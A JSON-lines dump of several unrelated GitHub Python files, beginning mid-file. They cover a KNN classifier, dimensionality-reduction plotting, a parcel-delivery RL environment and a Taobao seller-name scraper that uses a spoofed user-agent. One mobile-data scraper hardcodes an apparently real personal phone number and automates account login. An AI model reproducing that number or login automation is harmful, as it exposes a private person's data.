pd.read_csv(\"TrainData.txt\", header=None).values.tolist()\r\n testData = pd.read_csv(\"TestData.txt\", header=None).values.tolist()\r\n return trainingData, testData\r\n\r\ndef nearestKth(tuple, trainingData, kth):\r\n output = []\r\n distanceList = euclideanDistance(tuple, trainingData)\r\n distanceList.sort(key = lambda x : x.distance)\r\n return distanceList[0:kth]\r\n\r\ndef euclideanDistance(tuple, trainingData):\r\n distanceList=[]\r\n for i in range(len(trainingData)):\r\n distance = 0\r\n for j in range(len(tuple) - 1):\r\n distance += math.pow(math.fabs(float(tuple[j]) - float(trainingData[i][j])), 2)\r\n n = node()\r\n n.distance = math.sqrt(distance)\r\n n.nearestTuple = trainingData[i]\r\n distanceList.append(n)\r\n return distanceList\r\n\r\ndef handleTie(classes, trainData):\r\n predictedClasses = sorted(classes.items(), key=lambda kv: kv[1], reverse=True)\r\n tie = True\r\n if len(predictedClasses) == 1:\r\n return predictedClasses[0][0]\r\n if (predictedClasses[0][1] != predictedClasses[1][1]):\r\n tie = False\r\n return predictedClasses[0][0]\r\n if tie == False:\r\n print(\"predicted : \", predictedClasses[0][0])\r\n else:\r\n tiedClasses = []\r\n tiedClasses.append(predictedClasses[0][0])\r\n for i in range(1, len(predictedClasses)):\r\n if (predictedClasses[i][1] != predictedClasses[i - 1][1]):\r\n break\r\n if predictedClasses[i][0] not in tiedClasses:\r\n tiedClasses.append(predictedClasses[i][0])\r\n for i in trainData:\r\n if i[-1] in tiedClasses:\r\n return i[-1]\r\n\r\ndef featuresOccurrence(nearElements):\r\n classes = {}\r\n for i in nearElements:\r\n if i.nearestTuple[-1] not in classes:\r\n classes.update({i.nearestTuple[-1]: 1})\r\n else:\r\n classes[i.nearestTuple[-1]] += 1\r\n return classes\r\n\r\nif __name__ == '__main__':\r\n trainingData, testData = readData()\r\n kELements = []\r\n accuracies = []\r\n g_max = 0\r\n k_max = 0\r\n file = open(\"report.txt\", 'a+')\r\n for k in range(1,10):\r\n correctCount = 0\r\n total = 0\r\n accuracy = 0.0\r\n print(\"K = \", k)\r\n file.write(\"K = \" + str(k) + \"\\r\\n\")\r\n for i in testData:\r\n nearestRows = nearestKth(i, trainingData, k)\r\n classes = featuresOccurrence(nearestRows)\r\n actualclass = i[-1]\r\n predictedClass = handleTie(classes, trainingData)\r\n if(actualclass == predictedClass):\r\n correctCount += 1 \r\n file.write(\"Predicted : \" + predictedClass+ \" \" + \"Actual : \" + actualclass+ \"\\r\\n\") \r\n total += 1\r\n accuracy = correctCount / total\r\n if accuracy > g_max:\r\n g_max = accuracy\r\n k_max = k\r\n kELements.append(k)\r\n accuracies.append(accuracy)\r\n \r\n file.write(\"Number of correctly classified instances : \" + str(correctCount) + \"\\r\\n\") \r\n file.write(\"Total number of instances : \" + str(total) + \"\\r\\n\") \r\n file.write(\"Accuracy : \" + str(accuracy) + \"\\r\\n\")\r\n file.write(\"----------------------------------------------------------------------------------\" + \"\\r\\n\")\r\n file.close()\r\n print(\"k Max =\", k_max)\r\n print(\"accuracy =\", g_max)\r\n plt.plot(kELements, accuracies, \"b.\")\r\n plt.locator_params(axis='x', nbins=len(kELements))\r\n plt.show()","repo_name":"mahmoudmohey97/Machine-learning-projects","sub_path":"knn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34663951666","text":"import ResponseEnvelop_pb2\nfrom Util import NetUtil\nfrom Requests import DownloadSettingsRequest_pb2\nfrom Responses import DownloadSettingsResponse_pb2\n\nclass DownloadSettings(object):\n\t\n\tdef __init__(self, raw_request, url, logger=None):\n\t\tself.request = raw_request\n\t\tself.url = url\n\t\tself.logger = logger\n\t\n\n\tdef _handle_response(self, response):\n\t\tresponse_envelop = ResponseEnvelop_pb2.ResponseEnvelop()\n\t\tresponse_envelop.ParseFromString(response.content)\n\t\tdownload_settings_response = DownloadSettingsResponse_pb2.DownloadSettingsResponse()\n\t\tdownload_settings_response.ParseFromString(response_envelop.responses[0])\n\t\tassert download_settings_response\n\n\t\tif self.logger:\n\t\t\tself.logger.info(\"Received DOWNLOAD_SETTINGS response:\\r\\n\")\n\t\t\tself.logger.debug(\"%s\" % download_settings_response)\n\t\treturn download_settings_response\n\n\t\n\tdef get(self):\n\t\tdata = self.request.SerializeToString()\n\n\t\tif self.logger:\n\t\t\tself.logger.info(\"Sending DOWNLOAD_SETTINGS request:\\r\\n\")\n\t\t\tself.logger.debug(\"%s\" % self.request)\n\t\treturn self._handle_response(NetUtil.request(\"POST\", self.url, data))","repo_name":"TalSk/PokemonGoClient","sub_path":"Actions/DownloadSettings.py","file_name":"DownloadSettings.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"70041980933","text":"## importing the required packages\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas\nfrom sklearn import datasets\nfrom sklearn import decomposition\nfrom sklearn import manifold\nimport umap\nfrom time import time\nimport random\nimport os, sys\n\n'''\n@author Pujan Joshi\n@date Feb 01, 2019\nThis code runs PCA, UMAP and tSNE.\nThis code can also draw scatter plot from results of PCA, UMAP and tSNE.\nThis code also writes resuts (X-Y info) to the files.\n\n****library install scripts***\n\npython -m pip install -U pip\npython -m pip install -U matplotlib\npython -m pip install pandas\npython -m pip install -U scikit-learn\npython -m pip install umap-learn\n\n****library install scripts end here***\n\n'''\nwork_dir = \"\"\ninputFilename = 'C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/GSE155182/GSE155182_Normal_7m_liver.txt' # GSE115469_P5.csv\noutputFilename = ''\n\nRUN_PCA = True #True|False\nRUN_UMAP = True #True|False\nRUN_TSNE = True #True|False\nSHOW_PLOT = True #True|False\nTRANSPOSE = False #True|False #Transpose is needed if samples are rows\nn_iter = 700\ndelimiter = '\\t'; #'\\t' or ','\n\n#####\n##DO NOT CHANGE ANYTHING BELOW THIS LINE\n#####\n\nif work_dir != \"\":\n os.chdir(work_dir)\nprint(\"Current Working Directory \" , os.getcwd())\n\nhelp_msg = '''command line usage: \npython dimension_reduction.py \n-i (required)\n-o (default '', will auto-generate)\n-niter 700 (default)\n-delimiter \\\\t (default) || , \n-runPCA True || False (default)\n-runUMAP True || False (default)\n-runTSNE True || False (default)\n-showPlot True || False (default)\n-transpose True || False (default)\n'''\ndef parse_sys_argv(keys, help_msg=help_msg):\n args = sys.argv\n arguments = {}\n for key in keys:\n if key in args:\n arguments[key] = args[args.index(key) + 1]\n if len(arguments) == 0:\n print()\n print(help_msg)\n print()\n sys.exit()\n return arguments\n\n# # args_keys = [\"-i\", \"-o\", '-niter', '-delimiter', '-runPCA', '-runUMAP', '-runTSNE', '-showPlot', '-transpose', '-addLabel', '-labelFile', '-labelIndex']\n# # args = parse_sys_argv(args_keys)\n\n# # if '-i' in args:\n# # inputFilename = args['-i']\n# inputFilename = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/GSE119340/combined_subgroup.txt\"\n# # if '-o' in args:\n# outputFilename = \"C:/Users/whl19/Documents/Code/GenebetweenPathways/DataMaterial/GSE119340/combined_subgroup_test.txt\"\n# # if '-niter' in args:\n# n_iter = 200\n# if '-delimiter' in args:\n# delimiter = args['-delimiter']\n# if '-runPCA' in args:\n# # runPCA = args['-runPCA']\n# # RUN_PCA = False\n# # if runPCA.upper() == 'TRUE':\n# RUN_PCA = True\n# if '-runUMAP' in args:\n# # runUMAP = args['-runUMAP']\n# # RUN_UMAP = False\n# # if runUMAP.upper() == 'TRUE':\n# RUN_UMAP = True \n# if '-runTSNE' in args:\n# # runTSNE = args['-runTSNE']\n# # RUN_TSNE = False\n# # if runTSNE.upper() == 'TRUE':\n# RUN_TSNE = True \n# if '-showPlot' in args:\n# # showPlot = args['-showPlot']\n# # SHOW_PLOT = False\n# # if showPlot.upper() == 'TRUE':\n# SHOW_PLOT = True\n\n# if '-transpose' in args:\n# transpose = args['-transpose']\n# TRANSPOSE = False\n# if transpose.upper() == 'TRUE':\n# TRANSPOSE = True \nprint(\"start\")\nt = round(time())\nrand_int = random.randint(1,100)\no_filename_suffix = \"_\" + str(t) + \"_\" + str(rand_int)\n\nif outputFilename == '':\n outputFilename = inputFilename\n\ndot_pos = outputFilename.rfind(\".\")\nif dot_pos >= 0:\n outputFilename = outputFilename[: dot_pos]\n\no_filename = outputFilename + o_filename_suffix\n\n## Function to Scale and visualize the embedding vectors\nWRITE_TO_FILE = True\n\ndef plot_embedding(X, title=None):\n x_min, x_max = np.min(X, 0), np.max(X, 0)\n X = (X - x_min) / (x_max - x_min) \n plt.figure()\n ax = plt.subplot(111)\n for i in range(X.shape[0]):\n plt.text(X[i, 0], X[i, 1], \".\", \n fontdict={'weight': 'bold', 'size': 9})\n \n plt.xticks([]), plt.yticks([])\n if title is not None:\n plt.title(title)\nif TRANSPOSE:\n with open(inputFilename) as file:\n lis = [x.replace('\\n', '').split('\\t') for x in file]\n\n data = np.array(lis).T\n df = pandas.DataFrame(data=data[1:,:], index=data[1:,0], columns=data[0,:])\nelse:\n df = pandas.read_csv(inputFilename, delimiter=delimiter)\n\ncols = list(df.columns)[1:]\nX = df.values\nX = X[:, 1:]\nX = np.transpose(X)\ncols_t = np.array([cols])\nif RUN_PCA:\n ## Computing PCA\n print()\n print(\"Computing PCA projection...\")\n t0 = time()\n X_pca = decomposition.TruncatedSVD(n_components=2).fit_transform(X)\n #X_pca = decomposition.PCA(n_components=2).fit(X)\n tt_pca = round(time() - t0, 2)\n print(\"time taken by PCA:\", tt_pca, \"seconds\") \n if SHOW_PLOT:\n print(\"generating PCA plot...\")\n plot_title = \"PCA projection (time %.2fs)\" % (tt_pca)\n plot_embedding(X_pca, plot_title)\n\n if WRITE_TO_FILE:\n pca_filename = o_filename + '_pca.txt'\n print(\"writing PCA results to file named\", pca_filename)\n X_pca_2 = np.concatenate((cols_t.T, X_pca), axis=1)\n np.savetxt(pca_filename, X_pca_2, delimiter=delimiter, fmt='%s')\n\nif RUN_UMAP:\n ## Computing UMAP\n print()\n print(\"Computing UMAP projection...\")\n t0 = time()\n umap_dr = umap.UMAP()\n X_umap = umap_dr.fit_transform(X)\n tt_umap = round(time() - t0, 2)\n print(\"time taken by UMAP:\", tt_umap, \"seconds\")\n if SHOW_PLOT:\n print(\"generating umap scatter plot...\")\n plot_title = \"UMAP Projection (time %.2fs)\" % (tt_umap)\n plot_embedding(X_umap, plot_title)\n if WRITE_TO_FILE:\n umap_filename = o_filename + '_umap.txt'\n print(\"writing UMAP results to file named\", umap_filename)\n X_umap_2 = np.concatenate((cols_t.T, X_umap), axis=1)\n np.savetxt(umap_filename, X_umap_2, delimiter=delimiter, fmt='%s')\n \nif RUN_TSNE:\n ## Computing t-SNE\n print()\n print(\"Computing t-SNE with n_iter\", n_iter, \"..\")\n tsne = manifold.TSNE(init='pca', random_state=1, n_iter=n_iter)\n #tsne = manifold.TSNE()\n t0 = time()\n print(\"Transformation..\")\n X_tsne = tsne.fit_transform(X)\n tt_tsne = round(time() - t0, 2)\n print(\"time taken by tSNE:\", tt_tsne, \"seconds\")\n if SHOW_PLOT:\n print(\"generating t-SNE plot...\")\n plot_title = \"t-SNE (n_iter %d)(time %.2fs)\" % (n_iter, tt_tsne)\n plot_embedding(X_tsne, plot_title)\n if WRITE_TO_FILE:\n tsne_filename = o_filename + '_tsne_n' + str(n_iter) + '.txt'\n print(\"writing tSNE results to file named\", tsne_filename)\n X_tsne_2 = np.concatenate((cols_t.T, X_tsne), axis=1)\n np.savetxt(tsne_filename, X_tsne_2, delimiter=\"\\t\", fmt='%s')\n\nif SHOW_PLOT:\n print(\"displaing plots now ..\")\n plt.show()\n\n","repo_name":"Harry-Wang12/ctBuilder","sub_path":"code/Pyscript/SingleCellVisualization/dimension_reduction.py","file_name":"dimension_reduction.py","file_ext":"py","file_size_in_byte":6888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37241891559","text":"import cv2\nimport numpy as np\n\ndef window_1d(im, n):\n h,w = im.shape\n imout = np.copy(im)\n for i in range(n,w-n):\n for j in range(h):\n l = im[j,i-n]\n r = im[j,i+n]\n px = (float(l)+float(r))/2.0\n imout[j,i] = px\n return imout\n\ndef acuity_transform2d(img, acuity_src, acuity_dst):\n c = float(acuity_src)/float(acuity_dst)\n if c < 0.0:\n # acuity is actually higher for dst and we can't increase \"resolution\"\n return img\n factor = int(c/2)\n factor = min(factor, 20)\n\n chans = cv2.split(img)\n cl = len(chans)\n for c in range(cl):\n for i in range(1,factor+1):\n chans[c] = window_1d(chans[c], i) # horizontal pass\n chans[c] = window_1d(chans[c].T, i).T # vertical pass\n\n\n out = cv2.merge(chans)\n\n return out\n\n","repo_name":"readicculus/animaloptics","sub_path":"simulator/translations.py","file_name":"translations.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"75179966213","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\nimport logging\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom dateutil import parser\nimport sqlite3\nfrom datetime import datetime\n\nas_of = \"\"\ndata_remaining = \"\"\nmobile_number = \"9760854852\"\n\n\n\ndef getDataUsage():\n\n options = FirefoxOptions()\n # driver = webdriver.Firefox()\n # options.binary_location = '/usr/local/bin/geckodriver'\n # options.add_argument(\"--headless\")\n options.headless = True\n driver = webdriver.Firefox(options=options)\n\n driver.get(\"https://www.gomo.ph/sign-in.html\")\n\n # check if the webpage is in maintenance mode\n try:\n if driver.find_element_by_class_name(\"dawn-error-page__title\").text == \"We'll be back soon!\":\n # under maintenance\n print(\"under maintenance! please come back again later\")\n exit()\n except:\n print(\"Maintenance page not found, system is working as expected!\")\n\n elem = driver.find_element_by_name(\"regiterNumber\")\n elem.send_keys(mobile_number)\n elem.send_keys(Keys.RETURN)\n\n driver.implicitly_wait(10) # seconds\n\n # pin \n elemPin1 = driver.find_element_by_name(\"input-1\")\n elemPin1.send_keys(\"0\")\n elemPin2 = driver.find_element_by_name(\"input-2\")\n elemPin2.send_keys(\"0\")\n elemPin3 = driver.find_element_by_name(\"input-3\")\n elemPin3.send_keys(\"0\")\n elemPin4 = driver.find_element_by_name(\"input-4\")\n elemPin4.send_keys(\"0\")\n elemPin5 = driver.find_element_by_name(\"input-5\")\n elemPin5.send_keys(\"0\")\n elemPin6 = driver.find_element_by_name(\"input-6\")\n elemPin6.send_keys(\"0\")\n\n # get the remaining data from the dashboard\n driver.implicitly_wait(10) # seconds\n elemDataRemaining = driver.find_element_by_class_name(\"data-usage__item-content-title\").text\n elemDataRemainingAsOf = driver.find_element_by_class_name(\"data-usage__item-content-desc\").text\n \n print(elemDataRemaining + \" as of \" + elemDataRemainingAsOf)\n # file1 = open(\"usage.txt\",\"w\")\n # file1.write(elemDataRemaining + \" \" + elemDataRemainingAsOf)\n # file1.close()\n\n print(\"data:\" + elemDataRemaining)\n print(\"date:\" + elemDataRemainingAsOf)\n \n\n striped_date = elemDataRemainingAsOf.strip(\"as of \")\n striped_date = striped_date.replace(\",\",\"\")\n \n # print(\"formatted date:\" + striped_date)\n \n dt = parser.parse(striped_date)\n\n global data_remaining\n global as_of\n as_of = str(dt.date())\n data_remaining = str(elemDataRemaining)\n\n print(as_of)\n\n driver.quit()\n\ndef setup():\n\n con = sqlite3.connect('datamonitor.db')\n cur = con.cursor()\n # Create table\n sql_create_projects_table = \"\"\" CREATE TABLE IF NOT EXISTS data_usage (\n mobile_number text NOT NULL,\n date text NOT NULL,\n remaining_data text\n ); \"\"\"\n\n cur.execute(sql_create_projects_table)\n\n # Save (commit) the changes\n con.commit()\n\n con.close()\n\ndef saveToDatabase():\n\n con = sqlite3.connect('datamonitor.db')\n cur = con.cursor()\n\n # Insert a row of data\n cur.execute(\"INSERT INTO data_usage (mobile_number,date,remaining_data) VALUES (?,?,?)\",(mobile_number, as_of, data_remaining))\n\n # Save (commit) the changes\n con.commit()\n\n # We can also close the connection if we are done with it.\n # Just be sure any changes have been committed or they will be lost.\n con.close()\n\ndef main():\n logging.debug('Running data monitor ...')\n print('Running data monitor ...')\n setup()\n getDataUsage()\n saveToDatabase()\n\nif __name__ == \"__main__\":\n main()","repo_name":"fagray/gomo-bandwidth-monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32705357283","text":"from __future__ import print_function\n\nimport numpy as np\nimport numpy.ma as ma\nfrom Src.Utils.Utils import get_dist_mat_HGS,get_fleet\nfrom Environments.OOH.containers import Location,ParcelPoint,ParcelPoints,Vehicle,Fleet,Customer\nfrom Environments.OOH.env_utils import utils_env\nfrom Environments.OOH.customerchoice import customerchoicemodel\n\nclass Parcelpoint_py(object):\n def __init__(self,\n model,\n max_steps_r,\n max_steps_p,\n pricing = False,\n n_vehicles=2,\n veh_capacity=100,\n parcelpoint_capacity=25,\n incentive_sens=0.99,\n base_util=0.2,\n home_util=0.3,\n reopt=2000,\n load_data=False,\n coords=[],\n dist_matrix=[],\n n_parcelpoints=6,\n adjacency=[],\n service_times=[],\n dissatisfaction=False,\n hgs_time=3.0):\n \n #episode length params\n self.max_steps = 0\n self.max_steps_r = max_steps_r\n self.max_steps_p = max_steps_p\n \n #init fleet and parcelpoints\n self.n_vehicles = n_vehicles\n self.veh_capacity = veh_capacity\n self.pp_capacity = parcelpoint_capacity\n self.data = dict()\n \n #possible passed on data\n self.coords = coords\n self.dist_matrix = dist_matrix\n self.n_parcelpoints = n_parcelpoints\n self.adjacency = adjacency\n self.service_times = service_times\n \n #load data or generate data\n self.load_data = load_data\n self.n_unique_customer_locs = len(self.coords)-self.n_parcelpoints\n if self.load_data:\n print(\"\\n Note: the HGS python implementation (hygese 0.0.0.8) throws an assertion error for coords<0, you will need to outcomment this check in hygese.py \\n\")\n self.utils = utils_env(Location,Vehicle,Fleet,ParcelPoint,ParcelPoints,self.veh_capacity,self.n_vehicles,self.pp_capacity,self.data,self.dist_matrix,hgs_time)\n self.depot = self.coords[0]\n self.parcelPoints = self.utils.get_parcelpoints_from_data(self.coords[-self.n_parcelpoints:],self.n_unique_customer_locs)\n self.get_customer = self.get_new_customer_from_data\n self.num_cust_loc = len(self.dist_matrix)-len(self.parcelPoints[\"parcelpoints\"])-1\n self.dist_scaler = np.amax(self.dist_matrix)\n else:\n self.depot = Location(50,50,0,0)\n self.utils = utils_env(Location,Vehicle,Fleet,ParcelPoint,ParcelPoints,self.veh_capacity,self.n_vehicles,self.pp_capacity,self.data,self.dist_matrix,hgs_time)\n self.parcelPoints = self.utils.get_parcelpoints()\n self.get_customer = self.generate_new_customer\n self.dist_scaler = 10\n \n #customers\n self.home_util = home_util\n self.incentive_sens = incentive_sens\n self.dissatisfaction = dissatisfaction\n \n self.newCustomer = Customer\n self.fleet = get_fleet([self.depot,self.depot],self.n_vehicles,self.veh_capacity)\n\n #pricing of offering problem variant\n if pricing:\n #self.action_space_matrix = self.get_actions(pricing,self.n_parcelpoints)\n self.customerchoice = customerchoicemodel(base_util,self.dist_scaler,self.utils.getdistance_euclidean,self.dist_matrix,self.n_unique_customer_locs)\n self.customerChoice = self.customerchoice.customerchoice_pricing\n self.get_delivery_loc = self.get_delivery_loc_pricing\n else:\n #self.action_space_matrix = self.get_actions(pricing,self.n_parcelpoints)\n self.customerchoice = customerchoicemodel(base_util,self.dist_scaler,self.utils.getdistance_euclidean,self.dist_matrix,self.n_unique_customer_locs)\n self.customerChoice = self.customerchoice.customerchoice_offer\n self.get_delivery_loc = self.get_delivery_loc_offer\n \n self.steps = 0\n # self.max_steps = (self.n_vehicles*self.veh_capacity)\n self.reopt_freq = reopt\n \n self.reset()\n\n def seed(self, seed):\n self.seed = seed\n\n def reset(self,training=True):\n \"\"\"\n Sets the environment to default conditions\n \"\"\"\n self.max_steps = np.random.negative_binomial(self.max_steps_r,self.max_steps_p)\n \n self.fleet = self.utils.reset_fleet(self.fleet,[self.depot,self.depot])\n self.parcelPoints = self.utils.reset_parcelpoints(self.parcelPoints)\n \n self.steps = 0\n self.service_time = 0\n self.count_home_delivery = 0\n self.total_prices = []\n self.total_discounts = []\n \n self.data['x_coordinates'] = self.depot.x\n self.data['y_coordinates'] = self.depot.y\n self.data['id'] = 0\n self.data['time'] = 0\n self.data['vehicle_capacity'] = self.veh_capacity\n self.data['num_vehicles'] = self.n_vehicles\n \n self.count_dissatisfaction = 0\n \n self.curr_state = self.make_state()\n return self.curr_state\n\n def get_new_customer_from_data(self):\n idx = np.random.randint(1, self.num_cust_loc)\n home = self.coords[idx]#depot = 0\n home.time=self.steps\n service_time = self.service_times[idx]\n return Customer(home,self.incentive_sens,self.home_util,service_time,idx)\n\n def generate_new_customer(self):\n idx = np.random.randint(0, 100*100)\n home = self.coords[idx]#depot = 0\n home.time=self.steps\n service_time = self.service_times[idx]\n return Customer(home,self.incentive_sens,self.home_util,service_time,idx)\n\n def make_state(self):\n self.newCustomer = self.get_customer()\n state = [self.newCustomer,self.fleet,self.parcelPoints,self.steps]\n return state\n \n def abstract_state_ppo(self,state):\n newcust_x = state[0].home.x\n newcust_y = state[0].home.y\n \n #for user friendliness, we commented out the state route variables\n # closest_locations = []\n # for v in range(self.n_vehicles):\n # for loc in sorted(state[1][v][\"routePlan\"], key=distance_to_home)[:20]:\n # closest_locations.append(loc)\n \n return [newcust_x,newcust_y]\n \n def is_terminal(self):\n if self.steps > self.max_steps:\n return 1\n else:\n return 0\n \n def get_delivery_loc_pricing(self,action):\n mask = ma.masked_array(self.parcelPoints[\"parcelpoints\"], mask=self.adjacency[self.newCustomer.id_num])#only offer 20 closest\n return self.customerChoice(self.newCustomer,action,mask)\n \n def get_delivery_loc_offer(self,action):\n #get the chosen delivery location\n return self.customerChoice(self.newCustomer,action,self.parcelPoints[\"parcelpoints\"])\n \n def reopt_for_eval(self,data):\n if self.load_data:\n data[\"distance_matrix\"] = get_dist_mat_HGS(self.dist_matrix,data['id'])\n _,cost = self.utils.reopt_HGS(data)\n return cost\n \n #ToDo: cleanup saving statistics, not efficient right now\n def step(self,action):\n self.steps += 1\n \n #get the customer's choice of delivery location\n loc,accepted_pp,idx,price = self.get_delivery_loc(action)\n if price>0:\n self.total_prices.append(price)\n else:\n self.total_discounts.append(price)\n self.data['x_coordinates']= np.append(self.data['x_coordinates'],loc.x)\n self.data['y_coordinates'] = np.append(self.data['y_coordinates'],loc.y)\n self.data['id'] = np.append(self.data['id'],loc.id_num)\n self.data['time'] = np.append(self.data['time'],self.steps)\n \n #reduce parcelpoint capacity, if chosen\n if accepted_pp:\n self.parcelPoints[\"parcelpoints\"][idx-self.n_unique_customer_locs].remainingCapacity -= 1\n self.service_time+=0\n else:#home delivery\n self.service_time+=self.service_times[idx]\n self.count_home_delivery+=1\n \n if self.dissatisfaction:#perhaps remove, not used so far\n if np.mean(action)>2.75 and np.std(action)<1.0:\n self.count_dissatisfaction+=1\n \n #construct intermittent route kept in memory during booking horizon\n insertVeh,idx,costs = self.utils.cheapestInsertionRoute(loc,self.fleet)\n self.fleet[\"fleet\"][insertVeh][\"routePlan\"].insert(idx,loc)\n \n #re-optimize the intermeittent route after X steps, we did not do this for the paper\n if self.steps % self.reopt_freq == 0:#do re-opt using HGS\n if self.load_data:\n self.data[\"distance_matrix\"] = get_dist_mat_HGS(self.dist_matrix,self.data['id'])\n self.fleet,_ = self.utils.reopt_HGS(self.data)\n \n #info for plots and statistics\n stats = self.steps,self.count_home_delivery,self.service_time,self.total_prices,self.parcelPoints[\"parcelpoints\"],self.dist_matrix[self.newCustomer.home.id_num][loc.id_num],self.total_discounts,price\n \n #generate new customer arrival and return state info\n self.curr_state = self.make_state()\n \n return self.curr_state.copy(), self.is_terminal(), stats, self.data","repo_name":"frakkerman/ooh_code","sub_path":"Environments/OOH/Parcelpoint_py.py","file_name":"Parcelpoint_py.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14895644783","text":"import xlwt\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport re\nfrom time import sleep\ndcap = dict(DesiredCapabilities.PHANTOMJS)\nbook = xlwt.Workbook(encoding='utf-8', style_compression=0)\nsheet=book.add_sheet('sell')\ndcap[\"phantomjs.page.settings.userAgent\"] = (\n\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0\")\ndriver=webdriver.PhantomJS(r'C:\\Users\\战神皮皮迪\\Downloads\\phantomjs-2.1.1-windows\\bin\\phantomjs.exe')\nurl=input(\"输入你需要爬取的网址:\")\nendpage=input(\"输入向后爬取的数量:\")\nCurrentPage=re.findall(\"&s=(\\d+)\",url)\nCurrentPage=int(''.join(CurrentPage))\n#https://shopsearch.taobao.com/search?app=shopsearch&q=%E6%B5%B4&imgfile=&commend=all&ssid=s5-e&search_type=shop&sourceId=tb.index&spm=a21bo.1000386.201856-taobao-item.1&ie=utf8&initiative_id=tbindexz_20170306&isb=0&shop_type=&ratesum=&qq-pf-to=pcqq.c2c&sort=sale-desc&s=40\ndef get_content(i):\n driver.get(url.replace(\"&s=\"+str(CurrentPage),'&s=')+str(i))\n content=driver.page_source\n if len(driver.page_source)<500:\n sleep(1) #在这里改时间间隔\n get_content(i)\n else:\n nick=re.findall('\"nick\":\"(.*?)\",\"provcity',content)\n write_to_excel(i,nick)\ndef write_to_excel(star,data):\n # print(star ,' ',star+len(data))\n excel_start=star-CurrentPage\n excel_end=star+len(data)-CurrentPage\n for i in range(excel_start,excel_end):\n if i<20:\n sheet.write(i,0,data[i])\n print(data[i] + \"写入execl成功!\")\n else:\n List_Down=i-excel_start\n sheet.write(i,0,data[List_Down])\n print(data[List_Down]+ \"写入execl成功!\")\n\n\nfor i in range(CurrentPage,CurrentPage+int(endpage)*20+1,20):\n get_content(i)\n book.save(\"test1.xls\")","repo_name":"xiantang/Spider","sub_path":"TaoBaoShop/sell.py","file_name":"sell.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"44"} +{"seq_id":"37943252746","text":"import tkinter as tk\nimport Constants as consts\n\nclass UserInterface:\n def __init__(self,deck,validator,controller):\n self.validator = validator\n self.controller = controller\n self.deck = deck\n self.window = tk.Tk()\n self.deskCardImages = []\n self.buttonList = []\n\n #public function, used to start the gameUI\n def drawMain(self):\n self.initWindow()\n self.setMenuBar(self.window)\n topFrame,bodyFrame,bottomFrame = self.initWindowFrame(self.window)\n topFrame.pack()\n bodyFrame.pack()\n bottomFrame.pack()\n self.setGameBody(bodyFrame)\n self.setControlButton(bottomFrame)\n self.window.mainloop()\n \n #initialize rootwindow basic attribute, length height and titile\n def initWindow(self):\n length = consts.WINDOW_WIDTH\n height = consts.WINDOW_HEIGHT\n self.window.title(consts.GAME_NAME)\n self.window.geometry(\"%dx%d\" % (length,height))\n\n #set up window outline(divide it into frames)\n def initWindowFrame(self,window):\n return [tk.Frame(window),tk.Frame(window),tk.Frame(window)]\n\n #Set up----------------------------------Menubar start from here----------------------------------------------\n def setMenuBar(self,window):\n menubar = tk.Menu(window)\n self.setOptionMenu(menubar)\n self.setDifficultyMenu(menubar)\n window.config(menu=menubar)\n\n def setOptionMenu(self,menubar):\n optionMenu = tk.Menu(menubar,tearoff=0)\n menubar.add_cascade(label='Option',menu=optionMenu)\n optionMenu.add_command(label=\"Window size +\",command=self.controller.enlargeWindow(self.window))\n optionMenu.add_command(label=\"Window size -\",command=self.controller.reduceWindow(self.window))\n optionMenu.add_separator()\n optionMenu.add_command(label='Exit',command=self.window.quit)\n \n def setDifficultyMenu(self,menubar):\n difficultyMenu = tk.Menu(menubar,tearoff=0)\n menubar.add_cascade(label='Difficulty',menu=difficultyMenu)\n difficultyMenu.add_command(label=\"easy\",command=self.controller.changeGameDifficulty(consts.EASY,self.deck))\n difficultyMenu.add_command(label=\"middle\",command=self.controller.changeGameDifficulty(consts.MIDDLE,self.deck))\n difficultyMenu.add_command(label=\"hard\",command=self.controller.changeGameDifficulty(consts.HARD,self.deck))\n #-------------------------------------MenuBar End here-----------------------------------------------------\n\n\n #-------------------------------------bodyFrame start here------------------------------------------------\n def setGameBody(self,bodyFrame): \n self.controller.loadCardsImage(self.deck.deskCards,self.deskCardImages)\n self.showDesk(bodyFrame)\n # canvas.create_image(0,0, anchor='nw', image=img)\n # canvas.pack()\n\n def showDesk(self,bodyFrame):\n index = 0\n buttonList = []\n for i in range(0,consts.DESK_CARDS_ONECOL):\n rowList = []\n for j in range(0,consts.DESK_CARDS_ONEROW):\n button = tk.Button(bodyFrame,\n image = self.deskCardImages[index],\n command = lambda: self.controller.chooseCard(i,j,self.deck,button) )\n button.grid(row = i,column=j)\n rowList.append(button)\n index+=1\n buttonList.append(rowList)\n\n #-------------------------------------bodyFrame End here--------------------------------------------------\n\n\n def setControlButton(self,frameBottom):\n pass\n #set up submitted button\n\n #set up memu","repo_name":"muyizhu/SetGame","sub_path":"UserInterface.py","file_name":"UserInterface.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42436690617","text":"print ('Lambda Function')\n\n\nval1 = int(input('enter value 1 :'))\nval2 = int(input('enter value 2 :'))\n\nadd 